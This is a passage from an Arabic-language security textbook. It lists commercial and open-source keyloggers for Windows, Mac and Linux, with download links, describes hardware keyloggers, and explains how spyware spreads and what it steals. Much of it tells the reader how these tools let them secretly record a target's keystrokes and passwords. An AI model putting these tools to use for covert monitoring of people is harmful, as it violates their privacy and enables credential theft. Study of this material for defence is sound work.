Advanced Keylogger available at http://www.mykeylogger.com
The Best Keylogger available at http://www.thebestkeylogger.com
SoftActivity Keylogger available at http://www.softactivity.com
Elite Keylogger available at http://www.widestep.com
Powered Keylogger available at http://www.mykeylogger.com
StaffCop Standard available at http://www.staffcop.com
iMonitorPC available at http://www.imonitorgc.com
PC Activity Monitor Standard available at http://www.pcacme.com
KeyProwler available at http://www.keyprowler.com/
Keylogger Spy Monitor available at http://ematrixsoft.com
REFOG Personal Monitor available at http://www.refog.com
Actual Keylogger available at http://www.actualkeylogger.com
Spytector available at http://www.spytector.com/
KidLogger available at http://kidlogger.net
PC Spy Keylogger available at http://www.pc-spy-keylogger.com
Revealer Keylogger available at http://www.logixoft.com
Spy Keylogger available at http://www.spy-key-logger.com
SpyBuddy® 2012 available at http://www.exploreanywhere.com

Keylogger for MAC: Amac Keylogger for MAC


http://www.amackeylogger.com :‫اﻟﻣﺻدر‬
.‫ ھو ﻛﻠوﺟر ﯾﻌﻣل ﻋﻠﻰ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻣﺎك وﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز ﻣﺎك ﻟﻠﺗﺳﺟﯾل ﺳرا ﻛل ﺷﻲء ﻋﻠﻰ ﻣﺎك‬Amac Keylogger
:‫وﯾﻔﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ‬
.‫ ﺗﺳﺟﯾل ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﻣت ﻛﺗﺎﺑﺗﮭﺎ‬-
.‫ ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ‬-
.‫ ﺗﺳﺟل اﻟﻣواﻗﻊ وأﺧذ ﻟﻘطﺎت‬-
.‫ ﻟﻠﻣراﻗﺑﺔ ﻣﺎﻛﻧﺗوش‬IP ‫ ﺗﺳﺟﯾل ﻋﻧوان‬-
.‫ ﺗﺷﻐل ﺗﻠﻘﺎﺋﯾﺎ ﺳرا ﻋﻧد ﺑدء اﻟﺗﺷﻐﯾل‬-
.‫ ﺗطﺑﯾﻖ اﻹﻋدادات ﻋﻠﻰ ﻛﺎﻓﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻣﻊ ﺿﻐطﺔ واﺣدة‬-
.‫ ﻋﻠﻰ ﻓﺗرات ﻣﺣددة ﻣﺳﺑﻘﺎ‬email/FTP ‫ إرﺳﺎل اﻟﺳﺟﻼت إﻟﻰ‬-
.‫ ﺣﻣﺎﯾﺔ ﻛﻠﻣﺔ ﺳر اﻟوﺻول إﻟﻰ ﻛﻠوﻏر‬-

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


412

Keyloggers for MAC


‫ وھذه اﻷدوات‬. Mac‫ ھﻧﺎك أﯾﺿﺎ اﻟﻌدﯾد ﻣن ﻛﻠوﻏر اﻟذي ﯾﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل‬،‫ﻣﺛل ﺗطﺑﯾﻘﺎت ﻛﻠوﻏر اﻟﻣﺧﺻﺻﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‬
‫ ﯾﻣﻛﻧك ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻟﻣواﻗﻊ اﻟﺧﺎﺻﺔ‬. MAC OS‫ ورﺻد ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‬،‫ﺗﺳﺎﻋدك ﻋﻠﻰ ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬
‫ أﻧﮭﺎ ﺗﻣﻛﻧك ﻣن ﺗﺳﺟﯾل ﻛل ﺷﻲء ﯾﻔﻌﻠﮫ اﻟﻣﺳﺗﺧدم ﻋﻠﻰ‬.‫ ﯾﻣﻛﻧك أن ﺗﺳﺗﺧدﻣﮭﺎ ﻟﻠﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز ﻣﺎك ﻟﺗﺳﺟﯾل ﺳرا ﻛل ﺷﻲء ﻋﻠﻰ ﻣﺎك‬،‫ﺑﮭم‬
‫ اﻟﺦ‬،‫ وأﺧذ ﻟﻘطﺎت ﻣن ﻛل ﻧﺷﺎط‬،‫ اﻟدردﺷﺔ واﻟرﺳﺎﺋل‬،‫ وﺗﺳﺟﯾل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‬،‫اﻟﻛﻣﺑﯾوﺗر ﻣﺛل ﺗﺳﺟﯾل ﺿرﺑﺔ اﻟﻣﻔﺗﺎح‬
:Mac OS ‫ﯾﻣﻛﻧك اﺳﺗﺧدام ﻛﻠوﻏر اﻟﺗﺎﻟﯾﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل‬
Aobo Mac OS X KeyLogger available at http://www.keylogger-mac.com
Perfect Keylogger for Mac available at http://www.blazingtools.com
Award Keylogger for Mac available at http://www.award-soft.com
Mac Keylogger available at http://www.award-soft.com
REFOG Keylogger for MAC available at http://www.refog.com
KidLogger for MAC available at http://kidlogger.net
MAC Log Manager available at http://www.keylogger.in
Logkext available at https://code.google.com
Keyboard Spy available at http://alphaomega.software.free.fr
FreeMacKeylogger available at http://www.hwsuite.com

List of Linux Key Loggers


LKL -1

http://kaz.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz :‫اﻟﻣﺻدر‬
‫ ﯾﺗﺟﺳس وﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺷﻲء ﯾﻣر ﻣن ﺧﻼل ﻣﻧﻔذ ﻟوﺣﺔ‬LKL .linux--x86/arch ‫ ھو ﻛﻠوﻏر ﯾﻌﻣل ﻓﻲ ﺑﯾﺋﺔ اﻟﻣﺳﺗﺧدم ﺗﺣت‬LKL
.‫اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة‬
Log Key -2
http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz :‫اﻟﻣﺻدر‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪413‬‬

‫‪ Log keys‬ھو ﻛﻠوﻏر ﻣﺧﺻص ﻟﻠﯾﻧﻛس‪ .‬ﻓﺈﻧﮫ ﻟﯾس أﻛﺛر ﺗﻘدﻣﺎ ﻣن ﻏﯾرھﺎ ﻣن ﻛﻠوﻏر ﻟﯾﻧﻛس اﻟﻣﺗﺎﺣﺔ‪ ،‬ﻻ ﺳﯾﻣﺎ ‪ LKL‬و‪ ،uberkey‬وﻟﻛن ھو‬
‫أﺣدث ﻗﻠﯾﻼ‪ ،‬وأﻛﺛر ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ‪.‬‬
‫‪Ttypld -3‬‬

‫اﻟﻣﺻدر‪http://kaz.dl.sourceforge.net/project/ttyrpld/ttyrpld/2.60/ttyrpld-2.60.tar.bz2 :‬‬
‫‪ Ttyrpld‬ﯾﺳﺗﺧدم ﻟﺗﺳﺟﯾل أي ﺣرﻛﺔ ﻣرور واﻹﺟراءات اﻟﺗﻲ ﺗذھب ﻣن ﺧﻼل أي ﻣن أﺟﮭزة ‪ TTY‬ﻧواة اﻟﺧﺎص ﺑك‪.‬‬
‫‪uber key -4‬‬

‫اﻟﻣﺻدر‪ftp://ftp.nz.debian.org/freebsd/ports/distfiles/uberkey-1.2.tar.gz :‬‬
‫‪Vlogger -5‬‬

‫اﻟﻣﺻدر‪http://www.thc.org/releases/vlogger-2.1.1.tar.gz :‬‬
‫‪Simple Keylogger Python script -6‬‬

‫اﻟﻣﺻدر‪http://kaz.dl.sourceforge.net/project/linuxkeylogger/keylogger.py:‬‬

‫ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻘﺔ ﻋﻣل اﻟﻛﯾﻠوﺟرز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‬
‫‪https://www.thc.org/papers/writing-linux-kernel-keylogger.txt‬‬

‫‪Hardware Keyloggers‬‬
‫‪ Hardware Keylogger‬ھو ﻋﺑﺎره ﻋن أﺟﮭزه ﯾﺗم ﺗوﺻﯾﻠﮭﺎ ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ واﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟﮭدف‪ Hardware Keylogger .‬ﺗﺳﺟﯾل ﺟﻣﯾﻊ ﻧﺷﺎطﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ذاﻛرة اﻟداﺧﻠﯾﺔ‪ .‬ﻣﯾزة ‪Hardware‬‬
‫‪ Keylogger‬ﻋﻠﻰ ﺗطﺑﯾﻘﺎت ﻛﻠوﻏر ھو إﻣﻛﺎﻧﯾﺔ ﺗﺳﺟﯾﻠﮭﺎ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ أﻗرب وﻗت ﻣﻣﻛن ﺑدء ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام‬
‫‪ Hardware Keylogger‬اﻷﺗﯾﺔ ﻟﺗﺣﻘﯾﻖ أھداﻓك‪.‬‬
‫‪KeyGhost‬‬

‫اﻟﻣﺻدر‪http://www.keyghost.com :‬‬

‫‪Keyghost‬ھو ﺟﮭﺎز ذات اﻟﻣﻛوﻧﺎت اﻟﺻﻐﯾرة )‪ (tiny plug-in device‬واﻟذى ﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺿﻐطﺔ ﺗﻣت ﻛﺗﺑﺗﮭﺎ ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ رﺻد وﺗﺳﺟﯾل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‪ ،‬وﻧﺷﺎط ﻏرف اﻟدردﺷﺔ‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪ ،‬وﻋﻧﺎوﯾن ﻣواﻗﻊ اﻟوﯾب‪،‬‬
‫اﻟﺑﺣث ﻓﻲ ﻣﺣرﻛﺎت اﻟﺑﺣث‪ ،‬وأﻛﺛر ﻣن ذﻟك‪ .‬ﻻ ﺗﺣﺗﺎج ﻟﺗﺛﺑﯾت أي ﻣن اﻟﺑراﻣﺞ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﺳﺗرداد‪.‬‬
‫اﻟﻣﯾزات‪:‬‬
‫‪ -‬ﺳﮭل ﻓﻲ اﻻﺳﺗﺧدام‬
‫‪ -‬ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻓﻲ ﺛوان؛ ﺑﻣﺟرد ﺗوﺻﯾﻠﮫ‪.‬‬
‫‪ -‬ﯾﻣﻛن اﺳﺗﺧراﺟﮫ ﻣن ﺟﺎھز )‪ (unplugged‬وﺗوﺻﯾﻠﮫ ﺑﺟﮭﺎز اﺧر ﻻﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻛﻣﺑﯾوﺗر آﺧر‪.‬‬
‫‪ -‬ﻻ ﯾﺳﺗﺧدم أي ﻣن ﻣوارد اﻟﻧظﺎم‪.‬‬
‫‪ -‬ﻣﻣﺗﺎز ﻓﻲ اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ‪.‬‬

‫‪KeyGrabber‬‬

‫اﻟﻣﺻدر‪http://www.keydemon.com :‬‬

‫‪ KeyGrabber‬ھو ﺟﮭﺎز ﯾﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء ‪ PS/2‬أو ‪ .USB‬أﺟﮭزة ﺗﺳﺟﯾل اﻟﻔﯾدﯾو ھو ﺻﻐﯾرة‬
‫اﻹطﺎر ﻻﻟﺗﻘﺎط ﻟﻘطﺎت ﻣن ‪ HDMI ،DVI ،VGA‬أو ﻣﺻدر اﻟﻔﯾدﯾو‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪414‬‬

‫‪Spyware‬‬

‫اﻟﺗﺟﺳس )‪(Spyware‬ھو ﺑرﻧﺎﻣﺞ ﻟﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﺗﺧﻔﯾﺎ واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر‬
‫ﺳرا‪ .‬ﺣﯾث أﻧﮫ ﺗﻠﻘﺎﺋﯾﺎ ﯾﺳﻠم ﻣﻠﻔﺎت اﻟﺳﺟل ﻋﺑر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل ﺟﻣﯾﻊ ﻣﺟﺎﻻت اﻟﻧظﺎم ﻣﺛل إرﺳﺎل‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ )ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺳﺟﯾل اﻟدﺧول‪/‬ﻛﻠﻣﺔ ﻣرور‪،AIM ،AOL ،MSN ، ICQ‬‬
‫و ‪ Yahoo Messenger‬أو‪ ، (Webmail‬ﻣﻠف اﻟﻌﻣﻠﯾﺎت‪ ،‬وﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬ﻓﺈﻧﮫ ﯾﺄﺧذ أﯾﺿﺎ ﻟﻘطﺎت ﻋﻠﻰ ﻓﺗرات ﻣﺣددة‪،‬‬
‫ﻣﺛل ﻛﺎﻣﯾرا اﻟﻣراﻗﺑﺔ اﻟﻣﺗﺻﻠﺔ ﻣﺑﺎﺷرة ﺑﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻋﺎدة ﻣﺎ ﯾﻛون ‪ Spyware‬ﻣﻛون ﻣﺧﻔﻲ ﻓﻲ اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ أو اﻟﺑراﻣﺞ اﻟﻐﯾر ﻣﺟﺎﻧﯾﺔ‬
‫واﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻹﻧﺗرﻧت‪.‬‬

‫‪ Spyware Propagation‬اﻧﺗﺷﺎر ﺑراﻣﺞ اﻟﺗﺟﺳس‬


‫ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم ﻻ ﯾﺗطﻠب أي ﻣواﻓﻘﺔ ﻣن اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛﻧك ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس‬
‫ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم دون ﻋﻠﻣﮭم ﻣن ﺧﻼل ﺣﻣل " ‪ " piggybacking‬ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺑراﻣﺞ أﺧرى‪ ،‬وھذا ﻣﻣﻛن‬
‫ﻷن ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﺳﺗﺧدم ﻣﻠﻔﺎت ﺗﻌرﯾف اﻻرﺗﺑﺎط اﻹﻋﻼﻧﯾﺔ)‪ ، (advertising cookies‬واﻟﺗﻲ ھﻲ واﺣدة ﻣن اﻟﻔﺋﺎت اﻟﻔرﻋﯾﺔ ﻟﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس‪ ،‬وﯾﻣﻛﻧك أﯾﺿﺎ أن ﺗﺗﺄﺛر‪/‬ﺗﻌدى ﺑﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻧد زﯾﺎرة ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت اﻟذي ﯾوزع ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ ﻓﻲ‬
‫ﺑﻌض اﻷﺣﯾﺎن "‪ " drive-by downloading‬ﻷﻧﮫ ﯾﺛﺑت ﻧﻔﺳﮫ ﻋﻧد اﻟﻘﯾﺎم ﺑزﯾﺎرة اﻟﻣوﻗﻊ اﻹﻟﻛﺗروﻧﻲ‪.‬‬

‫ﺑﺳﺑب ﻋدم وﺟود اھﺗﻣﺎم ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم ﻋﻧد ﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻣن اﻹﻧﺗرﻧت‪ ،‬ﻓﺄﻧﮫ ﯾﻌطﻰ إﻣﻛﺎﻧﯾﺔ ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬ﯾﺗم دﻓﻊ‬
‫ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﺑراﻣﺞ أﺧرى ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس وﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم‬
‫دون أي إﺷﻌﺎر‪ ،‬ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪415‬‬

‫ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس ‪What Does the Spyware Do‬؟‬
‫ﺑﻣﺟرد ﻧﺟﺎح ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﯾﻣﻛﻧك أن ﺗﻔﻌل أﺷﯾﺎء ﻛﺛﯾرة ﻣﺳﯾﺋﺔ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑﺎﻟﻌدﯾد‬
‫ﻣن اﻻﻣور اﻟﺗﺎﻟﯾﺔ ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪:‬‬

‫ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺷﺧﺻﯾﺔ وإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣﻠﻘم ﺑﻌﯾد أو ‪.hijacker‬‬ ‫‪-‬‬
‫ﻣراﻗﺑﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬ ‫‪-‬‬
‫ﻋرض اﻟﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ اﻟﻣزﻋﺟﺔ وإﻋﺎدة ﺗوﺟﯾﮫ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت ﻟﻣواﻗﻊ اﻹﻋﻼﻧﺎت‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻣﺗﺻﻔﺢ اﻟوﯾب وﻣﻧﻊ اﻟﻣﺳﺗﺧدم ﻣن اﺳﺗﻌﺎدﺗﮫ‪.‬‬ ‫‪-‬‬
‫إﺿﺎﻓﺔ اﻟﻌﻼﻣﺎت اﻟﻣﺗﻌددة إﻟﻰ اﻟﻘﺎﺋﻣﺔ اﻟﻣﻔﺿﻠﺔ ﻓﻲ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت‬ ‫‪-‬‬
‫ﺧﻔض ﻣﺳﺗوى اﻷﻣن اﻟﻌﺎم ﻟﻠﻧظﺎم‪.‬‬ ‫‪-‬‬
‫وﺿﻊ اﺧﺗﺻﺎرات ﺳطﺢ اﻟﻣﻛﺗب إﻟﻰ ﻣواﻗﻊ اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ‪.‬‬ ‫‪-‬‬
‫اﻻﺗﺻﺎل ﺑﺎﻟﻣواﻗﻊ اﻹﺑﺎﺣﯾﺔ ﻋن ﺑﻌد‪.‬‬ ‫‪-‬‬
‫ﺗﺧﻔﯾض أداء اﻟﻧظﺎم وﯾﺳﺑب أﯾﺿﺎ ﻋدم اﺳﺗﻘرار اﻟﺑرﻣﺟﯾﺎت‪.‬‬ ‫‪-‬‬
‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‪.‬‬ ‫‪-‬‬
‫ارﺳﺎل ﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺳﺗﮭدف‪.‬‬ ‫‪-‬‬
‫ﺗﻌدﯾل اﻟﻣﻠﻔﺎت ‪ (dll) dynamically linked libraries‬وﺗﺑطﺊ اﻟﻣﺗﺻﻔﺢ‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر إﻋدادات ﺟدار اﻟﺣﻣﺎﯾﺔ‪.‬‬ ‫‪-‬‬
‫رﺻد وﻛﺗﺎﺑﺔ ﺗﻘﺎرﯾر ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﯾزورھﺎ اﻟﮭدف‪.‬‬ ‫‪-‬‬

‫أﻧواع ﺑراﻣﺞ اﻟﺗﺟﺳس )‪(TYPES OF SPYWARE‬‬


‫ھﻧﺎك ‪ 10‬أﻧواع رﺋﯾﺳﯾﺔ ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟم ﻟﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻋن ﻧﺷﺎط‬
‫اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑدون ﻣواﻓﻘﺗﮫ وﻣﻌرﻓﺗﮫ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ھذه اﻷﻧواع اﻟﻌﺷرة اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪1. Desktop Spyware‬‬


‫‪2. Email and Internet Spyware‬‬
‫‪3. Child Monitoring Spyware‬‬
‫‪4. Video Spyware‬‬
‫‪5. Print Spyware‬‬
‫‪6. Screen Capturing Spyware‬‬
‫‪7. USB Spyware‬‬
‫‪8. Audio Spyware‬‬
‫‪9. GPS Spyware‬‬
‫‪10. Cell Phone and Telephone Spyware‬‬
‫‪Desktop Spyware‬‬

‫ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب )‪ (Desktop spyware‬ھو ﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم أو ﺟﻣﯾﻊ‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮭﺎ ﻋﺑر اﻹﻧﺗرﻧت إﻟﻰ أطراف ﺛﺎﻟﺛﺔ دون ﻋﻠم اﻟﻣﺳﺗﺧدم أو ﻣواﻓﻘﺗﮫ‪ .‬ﯾوﻓر ﻣﻌﻠوﻣﺎت ﺑﺷﺄن ﻣﺎ ﻓﻌﻠﮫ‬
‫ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ ﻋﻠﻰ ﺳطﺢ ﻣﻛﺎﺗﺑﮭم)‪ ،(Desktop‬وﻛﯾف‪ ،‬وﻣﺗﻰ‪.‬‬
‫ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ -1‬اﻟﺗﺳﺟﯾل اﻟﺣﻲ ﻟﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪.‬‬
‫‪ -2‬ﻣراﻗﺑﺔ وﺗﺳﺟﯾل أﻧﺷطﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -3‬ﺗﺳﺟﯾل اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت ﺑﺎﻟﺗوﻗﯾت‪.‬‬
‫‪ -4‬ﺗﺳﺟﯾل ﻣﻠﻔﺎت ﺳﺟل اﻟﻧﺷﺎط )‪ (activities logs‬وﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي واﺣد‪.‬‬
‫‪ -5‬ﺗﺳﺟﯾل ﺿرﺑﺎت ﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪416‬‬

‫‪Desktop Spyware: Activity Monitor‬‬


‫اﻟﻣﺻدر‪http://www.softactivity.com :‬‬
‫‪ Activity Monitor‬ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﺗﺑﻊ أي ‪ ،LAN‬ﻣﻣﺎ ﯾﻌطﯾك أﻛﺛر اﻟﻣﻌﻠوﻣﺎت ﺗﻔﺻﯾﻼ ﺑﺷﺄن ﻣﺎ‪ ،‬وﻛﯾف‪ ،‬وﻣﺗﻰ ﯾﻔﻌﻠﮫ‬
‫ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ﯾﺗﻛون ھذا اﻟﻧظﺎم ﻣن أﺟزاء ﻣن اﻟﺧﺎدم واﻟﻌﻣﯾل‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ﺧﺎدم ‪ Activity Monitor‬ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﻛﻠﮭﺎ‪ .‬ﺛم ﯾﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋن ﺑﻌد ﻋﻠﻰ ﻛﺎﻓﺔ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل اﻟﺗﻲ ﺗرﯾد ﻣراﻗﺑﺗﮭﺎ‪ .‬ﻣن‬
‫اﻟﻣﻌروف أﯾﺿﺎ أن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋن ﺑﻌد ﺗﻌرف أﯾﺿﺎ ب ‪ ،Agent‬وھو ﺑرﻧﺎﻣﺞ ﻋﻣﯾل ﺻﻐﯾر‪ Agent .‬ﯾﻣﻛن ﺗﺛﺑﯾﺗﮫ ﻋن ﺑﻌد ﻣن ﺧﻼل‬
